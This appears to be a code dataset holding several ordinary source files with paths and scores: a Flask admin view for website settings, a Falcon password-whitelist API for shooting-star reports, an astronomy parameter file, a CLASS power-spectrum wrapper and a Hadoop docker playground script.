webIntro = request.form['webIntro']
webKeywords = request.form['webKeywords']
if not strLength(webName,1,32):
flash(u"网站名:最多16个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webIntro,1,256):
flash(u"网站简介:最多128个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webKeywords,1,128):
flash(u"网站关键词:最多64个汉字")
return redirect(url_for('admin.webSetting'))
current_user.custom['webName'] = webName
current_user.custom['webIntro'] = webIntro
current_user.custom['webKeywords'] = webKeywords
current_user.save()
flash(u"信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebLogo", methods=['POST'])
@login_required
def setWebLogo():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['logo']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['logo']))
current_user.custom['logo'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"logo修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebFavicon", methods=['POST'])
@login_required
def setWebFavicon():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['favicon']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['favicon']))
current_user.custom['favicon'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"网站图标修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCopyright", methods=['POST'])
@login_required
def setCopyright():
copyright = request.form['copyright'].strip()
if not strLength(copyright,1,100):
flash(u"copyright最多100个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['copyright'] = copyright
current_user.save()
flash(u"copyright信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setStatisticalCode", methods=['POST'])
@login_required
def setStatisticalCode():
statisticalCode = request.form['statisticalCode'].strip()
if not strLength(statisticalCode,0,1000):
flash(u"统计代码最多1000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['statisticalCode'] = statisticalCode
current_user.save()
flash(u"统计代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCommentCode", methods=['POST'])
@login_required
def setCommentCode():
commentCode = request.form['commentCode'].strip()
if not strLength(commentCode,0,2000):
flash(u"评论代码最多2000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['commentCode'] = commentCode
current_user.save()
flash(u"评论代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/webTemplate")
@bpAdmin.route("/webTemplate/<tpl>")
@login_required
def webTemplate(tpl=None):
themePath = os.path.join(current_app.config['BASE_DIR'], current_app.config['TPMPLATE_PATH'])
themes = os.listdir(themePath)
tpls = []
for h in themes:
tpls.append([h, '/%s/%s/%s' % (current_app.config['TPMPLATE_PATH'],h,'cover.jpg')])
if not tpl:
return render_template('admin/webTemplate.html',tpls=tpls)
elif tpl in themes:
current_user.custom['homeTemplate'] = 'theme/%s' % tpl
current_user.save()
flash(u'主题设置成功')
return redirect(url_for('admin.webTemplate')) | project/app/admin/webView.py |
import os
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.filePreprocess import allowedImage, creatFileName, allowedFileSize, removeFile
from project.common.dataPreprocess import strLength
@bpAdmin.route("/webSetting")
@login_required
def webSetting():
return render_template('admin/webSetting.html')
@bpAdmin.route("/setWebInfo", methods=['POST'])
@login_required
def setWebInfo():
webName = request.form['webName']
webIntro = request.form['webIntro']
webKeywords = request.form['webKeywords']
if not strLength(webName,1,32):
flash(u"网站名:最多16个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webIntro,1,256):
flash(u"网站简介:最多128个汉字")
return redirect(url_for('admin.webSetting'))
if not strLength(webKeywords,1,128):
flash(u"网站关键词:最多64个汉字")
return redirect(url_for('admin.webSetting'))
current_user.custom['webName'] = webName
current_user.custom['webIntro'] = webIntro
current_user.custom['webKeywords'] = webKeywords
current_user.save()
flash(u"信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebLogo", methods=['POST'])
@login_required
def setWebLogo():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['logo']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['logo']))
current_user.custom['logo'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"logo修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setWebFavicon", methods=['POST'])
@login_required
def setWebFavicon():
img = request.files.get('img')
if not allowedFileSize(len(img.read()),1):
flash(u"请上传小于1M的图片!")
return redirect(url_for('admin.webSetting'))
#文件read后,要重样把指针定位到开头
img.seek(0)
if img and allowedImage(img.filename):
try:
fileName = creatFileName(current_user.id, img.filename)
img.save(os.path.join(current_app.config['UPLOAD_PATH'], fileName))
if 'local/images/' not in current_user.custom['favicon']:
#删除以前的图片
removeFile(os.path.join(current_app.config['STATIC_PATH'], current_user.custom['favicon']))
current_user.custom['favicon'] = current_app.config['UPLOAD_PATH_FOR_DB'] + '/' + fileName
current_user.save()
flash(u"网站图标修改成功!")
except:
flash(u"图片上传失败!")
else:
flash(u"请上传png/jpg/gif图片!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCopyright", methods=['POST'])
@login_required
def setCopyright():
copyright = request.form['copyright'].strip()
if not strLength(copyright,1,100):
flash(u"copyright最多100个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['copyright'] = copyright
current_user.save()
flash(u"copyright信息修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setStatisticalCode", methods=['POST'])
@login_required
def setStatisticalCode():
statisticalCode = request.form['statisticalCode'].strip()
if not strLength(statisticalCode,0,1000):
flash(u"统计代码最多1000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['statisticalCode'] = statisticalCode
current_user.save()
flash(u"统计代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/setCommentCode", methods=['POST'])
@login_required
def setCommentCode():
commentCode = request.form['commentCode'].strip()
if not strLength(commentCode,0,2000):
flash(u"评论代码最多2000个字符")
return redirect(url_for('admin.webSetting'))
current_user.custom['commentCode'] = commentCode
current_user.save()
flash(u"评论代码修改成功!")
return redirect(url_for('admin.webSetting'))
@bpAdmin.route("/webTemplate")
@bpAdmin.route("/webTemplate/<tpl>")
@login_required
def webTemplate(tpl=None):
themePath = os.path.join(current_app.config['BASE_DIR'], current_app.config['TPMPLATE_PATH'])
themes = os.listdir(themePath)
tpls = []
for h in themes:
tpls.append([h, '/%s/%s/%s' % (current_app.config['TPMPLATE_PATH'],h,'cover.jpg')])
if not tpl:
return render_template('admin/webTemplate.html',tpls=tpls)
elif tpl in themes:
current_user.custom['homeTemplate'] = 'theme/%s' % tpl
current_user.save()
flash(u'主题设置成功')
return redirect(url_for('admin.webTemplate')) | 0.230573 | 0.040087 |
import json
import sqlite3
import time
import falcon
from base_shooting_stars_resource import BaseShootingStarsResource, hook_validate_auth
from constants import ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT, ERROR_MSG_DATA_VALIDATION_FAIL
master_pw_whitelist = set()
scout_pw_whitelist = set()
def hook_validate_scout_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in scout_pw_whitelist and authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_master_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_whitelist_params(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
msg = ERROR_MSG_DATA_VALIDATION_FAIL
if not isinstance(req.media.get('password', None), str):
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
class PasswordBasedShootingStarsResource:
def __init__(self, path_to_db: sqlite3.Connection):
self.shooting_stars_resource = BaseShootingStarsResource(path_to_db)
scout_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM scout_whitelist').fetchall()
for scout in scout_pws:
scout_pw_whitelist.add(scout['password'])
master_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM master_whitelist').fetchall()
for master in master_pws:
master_pw_whitelist.add(master['password'])
@falcon.before(hook_validate_master_password)
def on_get_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.text = json.dumps(list(scout_pw_whitelist.difference(master_pw_whitelist)))
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_post_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
scout_pw_whitelist.add(pw)
self.shooting_stars_resource.conn.execute("""
INSERT
INTO scout_whitelist
VALUES
(?)
""", [pw])
self.shooting_stars_resource.conn.commit()
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_delete_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
if pw in scout_pw_whitelist:
self.shooting_stars_resource.conn.execute("""
DELETE
FROM data
WHERE
sharedKey = ?
""", [pw])
self.shooting_stars_resource.conn.execute("""
DELETE
FROM scout_whitelist
WHERE
password = ?
""", [pw])
self.shooting_stars_resource.conn.commit()
scout_pw_whitelist.discard(pw)
resp.text = 'Successfully removed from whitelist and data cleared'
else:
resp.text = 'No such key found in the whitelist'
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp
@falcon.before(hook_validate_scout_password)
def on_post(self, req: falcon.request.Request, resp: falcon.response.Response):
return self.shooting_stars_resource.on_post(req, resp)
@falcon.before(hook_validate_auth)
def on_get(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute("""
SELECT location, world, MAX(minTime) as minTime, MIN(maxTime) as maxTime
FROM data
WHERE
maxTime > ? AND maxTime < ?
GROUP BY location, world
ORDER BY maxTime
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime']
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
return resp
@falcon.before(hook_validate_master_password)
def on_get_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute(f"""
SELECT location, world, minTime, maxTime, sharedKey
FROM data
WHERE
maxTime > ? AND maxTime < ?
ORDER BY world
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime'],
'password': (row['sharedKey'] if row['sharedKey'] not in master_pw_whitelist else 'MASTER PASSWORD')
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp | password_based_shooting_stars_resource.py | import json
import sqlite3
import time
import falcon
from base_shooting_stars_resource import BaseShootingStarsResource, hook_validate_auth
from constants import ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT, ERROR_MSG_DATA_VALIDATION_FAIL
master_pw_whitelist = set()
scout_pw_whitelist = set()
def hook_validate_scout_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in scout_pw_whitelist and authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_master_password(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
authorization = req.auth
if authorization not in master_pw_whitelist:
msg = ERROR_MSG_AUTHORIZATION_FAIL_SUBMIT
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
def hook_validate_whitelist_params(req: falcon.request.Request, resp: falcon.response.Response, resource, params):
msg = ERROR_MSG_DATA_VALIDATION_FAIL
if not isinstance(req.media.get('password', None), str):
raise falcon.HTTPBadRequest(title='Bad request', description=msg)
class PasswordBasedShootingStarsResource:
def __init__(self, path_to_db: sqlite3.Connection):
self.shooting_stars_resource = BaseShootingStarsResource(path_to_db)
scout_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM scout_whitelist').fetchall()
for scout in scout_pws:
scout_pw_whitelist.add(scout['password'])
master_pws = self.shooting_stars_resource.conn.execute('SELECT password FROM master_whitelist').fetchall()
for master in master_pws:
master_pw_whitelist.add(master['password'])
@falcon.before(hook_validate_master_password)
def on_get_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.text = json.dumps(list(scout_pw_whitelist.difference(master_pw_whitelist)))
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_post_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
scout_pw_whitelist.add(pw)
self.shooting_stars_resource.conn.execute("""
INSERT
INTO scout_whitelist
VALUES
(?)
""", [pw])
self.shooting_stars_resource.conn.commit()
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
@falcon.before(hook_validate_master_password)
@falcon.before(hook_validate_whitelist_params)
def on_delete_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
pw = req.media['password'].strip()
if pw in scout_pw_whitelist:
self.shooting_stars_resource.conn.execute("""
DELETE
FROM data
WHERE
sharedKey = ?
""", [pw])
self.shooting_stars_resource.conn.execute("""
DELETE
FROM scout_whitelist
WHERE
password = ?
""", [pw])
self.shooting_stars_resource.conn.commit()
scout_pw_whitelist.discard(pw)
resp.text = 'Successfully removed from whitelist and data cleared'
else:
resp.text = 'No such key found in the whitelist'
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_whitelist(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp
@falcon.before(hook_validate_scout_password)
def on_post(self, req: falcon.request.Request, resp: falcon.response.Response):
return self.shooting_stars_resource.on_post(req, resp)
@falcon.before(hook_validate_auth)
def on_get(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute("""
SELECT location, world, MAX(minTime) as minTime, MIN(maxTime) as maxTime
FROM data
WHERE
maxTime > ? AND maxTime < ?
GROUP BY location, world
ORDER BY maxTime
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime']
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
return resp
@falcon.before(hook_validate_master_password)
def on_get_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
# Get all current worlds for all keys.
lowest_time = int(time.time()) - (60*60)
highest_time = int(time.time()) + (60*150)
rows = self.shooting_stars_resource.conn.execute(f"""
SELECT location, world, minTime, maxTime, sharedKey
FROM data
WHERE
maxTime > ? AND maxTime < ?
ORDER BY world
""", [lowest_time, highest_time]).fetchall()
# Put data in json format
data_blob = []
for row in rows:
data = {
'location': row['location'],
'world': row['world'],
'minTime': row['minTime'],
'maxTime': row['maxTime'],
'password': (row['sharedKey'] if row['sharedKey'] not in master_pw_whitelist else 'MASTER PASSWORD')
}
data_blob.append(data)
resp.text = json.dumps(data_blob)
resp.append_header('Access-Control-Allow-Origin', '*')
return resp
def on_options_separate(self, req: falcon.request.Request, resp: falcon.response.Response):
resp.status = falcon.HTTP_200
resp.append_header('Access-Control-Allow-Origin', '*')
resp.append_header('Access-Control-Allow-Headers', '*')
resp.append_header('Access-Control-Allow-Methods', '*')
return resp | 0.393968 | 0.078008 |
### DON NOT FORGET TO MODIFY idlib
import os
verbose = False
src = 'M83'
Nmc = 60
## Current dir
##-------------
path_cur = os.getcwd()+'/'
path_par = os.path.dirname(os.path.abspath(__file__))+'/' # param file path
## IDL dir
##---------
path_idl = path_par+'idlib/'
## Root dir
##----------
## Root of data and outputs
path_root = '/Users/dhu/Data/'
## Data dir
path_irs = path_root+'Spitzer/data/'+src+'/'
path_phot = path_root+'Photometry/'+src+'/'
path_ker = path_root+'Kernels/'
## IRS data (via CUBISM)
##-----------------------
fits_sl2 = []
fits_sl3 = []
fits_sl1 = []
fits_ll2 = []
fits_ll3 = []
fits_ll1 = []
fits_irs = []
Nch = 4 # Number of chnl (ordered as below) used
chnl = ['SL2', 'SL3', 'SL1', 'LL2', 'LL3', 'LL1']
# lab_sl = ['_04', '_06', '_08', '_09'] # M82
# lab_ll = ['_04', '_05', '_06', '_08', '_09'] # M82
lab_sl = ['']
lab_ll = ['']
for i, ch in enumerate(chnl):
## SL
if i//3==0:
for t in lab_sl:
f = path_irs+src+t+'_'+ch
if ch=='SL2':
fits_sl2.append(f)
if ch=='SL3':
fits_sl3.append(f)
if ch=='SL1':
fits_sl1.append(f)
## LL
else:
for t in lab_ll:
f = path_irs+src+t+'_'+ch
if ch=='LL2':
fits_ll2.append(f)
if ch=='LL3':
fits_ll3.append(f)
if ch=='LL1':
fits_ll1.append(f)
fits_irs.append(fits_sl2)
fits_irs.append(fits_sl3)
fits_irs.append(fits_sl1)
fits_irs.append(fits_ll2)
fits_irs.append(fits_ll3)
fits_irs.append(fits_ll1)
## Convolution
##-------------
fits_ker = []
psf = [2., 2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.]
# psf_ref = 'IRAC_5.8' # 2.11 (< LL1)
# psf_ref = 'IRAC_8.0'# 2.82 (< LL1)
psf_ref = 'Gauss_06.0'
# psf_ref = 'MIPS_24' # 6.43"
# psf_ref = 'WISE_MAP_11.6' # 6.60"
# psf_ref = 'WISE_MAP_22.1' # 11.89"
for p in psf:
fits_ker.append(path_ker+'Kernel_HiRes_Gauss_0'+
str(p)+'_to_'+psf_ref)
## Tmp files
##-----------
path_tmp = path_root+'PAHPedia/tmp/'
if not os.path.exists(path_tmp):
os.makedirs(path_tmp)
path_conv = path_tmp+'conv/' # idlib/convolve_image.pro
if not os.path.exists(path_conv):
os.makedirs(path_conv)
csv_ker = path_tmp+'kernelist' # idlib/conv_prog.pro
## Outputs
##---------
path_out = path_root+'PAHPedia/'+src+'/' # idlib/conv_prog.pro
## Calibrations
phot = 'IRAC4' # photometry filter
path_cal = path_out+'calib/'
if not os.path.exists(path_cal):
os.makedirs(path_cal)
## Tests
##-------
path_tests = path_root+'PAHPedia/tests/' | MIRAGE/arx/v0_2/param_irs_M83.py |
### DON NOT FORGET TO MODIFY idlib
import os
verbose = False
src = 'M83'
Nmc = 60
## Current dir
##-------------
path_cur = os.getcwd()+'/'
path_par = os.path.dirname(os.path.abspath(__file__))+'/' # param file path
## IDL dir
##---------
path_idl = path_par+'idlib/'
## Root dir
##----------
## Root of data and outputs
path_root = '/Users/dhu/Data/'
## Data dir
path_irs = path_root+'Spitzer/data/'+src+'/'
path_phot = path_root+'Photometry/'+src+'/'
path_ker = path_root+'Kernels/'
## IRS data (via CUBISM)
##-----------------------
fits_sl2 = []
fits_sl3 = []
fits_sl1 = []
fits_ll2 = []
fits_ll3 = []
fits_ll1 = []
fits_irs = []
Nch = 4 # Number of chnl (ordered as below) used
chnl = ['SL2', 'SL3', 'SL1', 'LL2', 'LL3', 'LL1']
# lab_sl = ['_04', '_06', '_08', '_09'] # M82
# lab_ll = ['_04', '_05', '_06', '_08', '_09'] # M82
lab_sl = ['']
lab_ll = ['']
for i, ch in enumerate(chnl):
## SL
if i//3==0:
for t in lab_sl:
f = path_irs+src+t+'_'+ch
if ch=='SL2':
fits_sl2.append(f)
if ch=='SL3':
fits_sl3.append(f)
if ch=='SL1':
fits_sl1.append(f)
## LL
else:
for t in lab_ll:
f = path_irs+src+t+'_'+ch
if ch=='LL2':
fits_ll2.append(f)
if ch=='LL3':
fits_ll3.append(f)
if ch=='LL1':
fits_ll1.append(f)
fits_irs.append(fits_sl2)
fits_irs.append(fits_sl3)
fits_irs.append(fits_sl1)
fits_irs.append(fits_ll2)
fits_irs.append(fits_ll3)
fits_irs.append(fits_ll1)
## Convolution
##-------------
fits_ker = []
psf = [2., 2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.]
# psf_ref = 'IRAC_5.8' # 2.11 (< LL1)
# psf_ref = 'IRAC_8.0'# 2.82 (< LL1)
psf_ref = 'Gauss_06.0'
# psf_ref = 'MIPS_24' # 6.43"
# psf_ref = 'WISE_MAP_11.6' # 6.60"
# psf_ref = 'WISE_MAP_22.1' # 11.89"
for p in psf:
fits_ker.append(path_ker+'Kernel_HiRes_Gauss_0'+
str(p)+'_to_'+psf_ref)
## Tmp files
##-----------
path_tmp = path_root+'PAHPedia/tmp/'
if not os.path.exists(path_tmp):
os.makedirs(path_tmp)
path_conv = path_tmp+'conv/' # idlib/convolve_image.pro
if not os.path.exists(path_conv):
os.makedirs(path_conv)
csv_ker = path_tmp+'kernelist' # idlib/conv_prog.pro
## Outputs
##---------
path_out = path_root+'PAHPedia/'+src+'/' # idlib/conv_prog.pro
## Calibrations
phot = 'IRAC4' # photometry filter
path_cal = path_out+'calib/'
if not os.path.exists(path_cal):
os.makedirs(path_cal)
## Tests
##-------
path_tests = path_root+'PAHPedia/tests/' | 0.144601 | 0.124107 |
import numpy as np
__all__ = [
'classy',
]
def classy(wavenumber, redshift, cosmology, **kwargs):
""" Return the CLASS computation of the linear matter power spectrum, on a
two dimensional grid of wavenumber and redshift.
Additional CLASS parameters can be passed via keyword arguments.
Parameters
----------
wavenumber : (nk,) array_like
Array of wavenumbers in units of Mpc-1 at which to
evaluate the linear matter power spectrum.
redshift : (nz,) array_like
Array of redshifts at which to evaluate the linear matter power
spectrum.
cosmology : astropy.cosmology.Cosmology
Cosmology object providing omega_matter, omega_baryon, Hubble
parameter and CMB temperature in the present day
Returns
-------
power_spectrum : (nz, nk) array_like
Array of values for the linear matter power spectrum in Mpc3
evaluated at the input wavenumbers for the given primordial power
spectrum parameters, cosmology. For nz redshifts and nk wavenumbers
the returned array will have shape (nz, nk).
Examples
--------
>>> import numpy as np
>>> from astropy.cosmology import default_cosmology
>>> cosmology = default_cosmology.get()
>>> redshift = np.array([0, 1])
>>> wavenumber = np.array([1.e-2, 1.e-1, 1e0])
>>> A_s = 2.e-9
>>> n_s = 0.965
>>> z_reio = 10.
>>> classy(wavenumber, redshift, cosmology, A_s, n_s, z_reio) # doctest: +SKIP
array([[2.34758952e+04, 8.70837957e+03],
[3.03660813e+03, 1.12836115e+03],
[2.53124880e+01, 9.40802814e+00]])
References
----------
doi : 10.1088/1475-7516/2011/07/034
arXiv: 1104.2932, 1104.2933
"""
try:
from classy import Class
except ImportError:
raise Exception("classy is required to use skypy.linear.classy")
h2 = cosmology.h * cosmology.h
params = {
'output': 'mPk',
'P_k_max_1/Mpc': np.max(wavenumber),
'z_pk': ', '.join(str(z) for z in np.atleast_1d(redshift)),
'H0': cosmology.H0.value,
'omega_b': cosmology.Ob0 * h2,
'omega_cdm': cosmology.Odm0 * h2,
'T_cmb': cosmology.Tcmb0.value,
'N_eff': cosmology.Neff,
}
params.update(kwargs)
classy_obj = Class()
classy_obj.set(params)
classy_obj.compute()
z = np.expand_dims(redshift, (-1,)*np.ndim(wavenumber))
k = np.expand_dims(wavenumber, (0,)*np.ndim(redshift))
z, k = np.broadcast_arrays(z, k)
pzk = np.empty(z.shape)
for i in np.ndindex(*pzk.shape):
pzk[i] = classy_obj.pk_lin(k[i], z[i])
if pzk.ndim == 0:
pzk = pzk.item()
return pzk | skypy/power_spectrum/_classy.py | import numpy as np
__all__ = [
'classy',
]
def classy(wavenumber, redshift, cosmology, **kwargs):
""" Return the CLASS computation of the linear matter power spectrum, on a
two dimensional grid of wavenumber and redshift.
Additional CLASS parameters can be passed via keyword arguments.
Parameters
----------
wavenumber : (nk,) array_like
Array of wavenumbers in units of Mpc-1 at which to
evaluate the linear matter power spectrum.
redshift : (nz,) array_like
Array of redshifts at which to evaluate the linear matter power
spectrum.
cosmology : astropy.cosmology.Cosmology
Cosmology object providing omega_matter, omega_baryon, Hubble
parameter and CMB temperature in the present day
Returns
-------
power_spectrum : (nz, nk) array_like
Array of values for the linear matter power spectrum in Mpc3
evaluated at the input wavenumbers for the given primordial power
spectrum parameters, cosmology. For nz redshifts and nk wavenumbers
the returned array will have shape (nz, nk).
Examples
--------
>>> import numpy as np
>>> from astropy.cosmology import default_cosmology
>>> cosmology = default_cosmology.get()
>>> redshift = np.array([0, 1])
>>> wavenumber = np.array([1.e-2, 1.e-1, 1e0])
>>> A_s = 2.e-9
>>> n_s = 0.965
>>> z_reio = 10.
>>> classy(wavenumber, redshift, cosmology, A_s, n_s, z_reio) # doctest: +SKIP
array([[2.34758952e+04, 8.70837957e+03],
[3.03660813e+03, 1.12836115e+03],
[2.53124880e+01, 9.40802814e+00]])
References
----------
doi : 10.1088/1475-7516/2011/07/034
arXiv: 1104.2932, 1104.2933
"""
try:
from classy import Class
except ImportError:
raise Exception("classy is required to use skypy.linear.classy")
h2 = cosmology.h * cosmology.h
params = {
'output': 'mPk',
'P_k_max_1/Mpc': np.max(wavenumber),
'z_pk': ', '.join(str(z) for z in np.atleast_1d(redshift)),
'H0': cosmology.H0.value,
'omega_b': cosmology.Ob0 * h2,
'omega_cdm': cosmology.Odm0 * h2,
'T_cmb': cosmology.Tcmb0.value,
'N_eff': cosmology.Neff,
}
params.update(kwargs)
classy_obj = Class()
classy_obj.set(params)
classy_obj.compute()
z = np.expand_dims(redshift, (-1,)*np.ndim(wavenumber))
k = np.expand_dims(wavenumber, (0,)*np.ndim(redshift))
z, k = np.broadcast_arrays(z, k)
pzk = np.empty(z.shape)
for i in np.ndindex(*pzk.shape):
pzk[i] = classy_obj.pk_lin(k[i], z[i])
if pzk.ndim == 0:
pzk = pzk.item()
return pzk | 0.879826 | 0.711497 |
import argparse
import collections
import distutils.dir_util
import json
import os
import re
import shutil
import subprocess
import sys
import time
# PyPI installed modules...
import requests
# The root directory of the playground repository
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
# The hadoop distribution path on the docker nodes
HADOOP_HOME = '/himage/hadoop-3.3.0'
# The hive distribution path on the docker nodes
HIVE_HOME = '/himage/apache-hive-3.1.2-bin'
# The sqoop distribution path on the docker nodes
SQOOP_HOME = '/himage/sqoop-1.4.7.bin__hadoop-2.6.0'
# The path of the docker-compose.yml file
COMPOSE_FILE = os.path.join(ROOT_DIR, 'docker-compose.yml')
# The non-secured sql password used on the sql node
SQL_TEST_PASSWORD = '<PASSWORD>'
# The number of data nodes in the cluster (this variable only affects health checks)
NUM_DATA_NODES = 1
# The number of node manager nodes in the cluster (this variable only affects health checks)
NUM_NODE_MANAGERS = 1
# The minimum amount of disk space each node requires to operate (applicable in health checks)
MIN_DISK_SPACE = 8589934592 # 1GB
# Exposed localhost ports for each of the nodes
PORT_UI_NN1 = 3000
PORT_UI_DN1 = 3001
PORT_UI_RMAN = 3002
PORT_UI_NM1 = 3003
PORT_UI_MRHIST = 3004
PORT_UI_HS = 3005
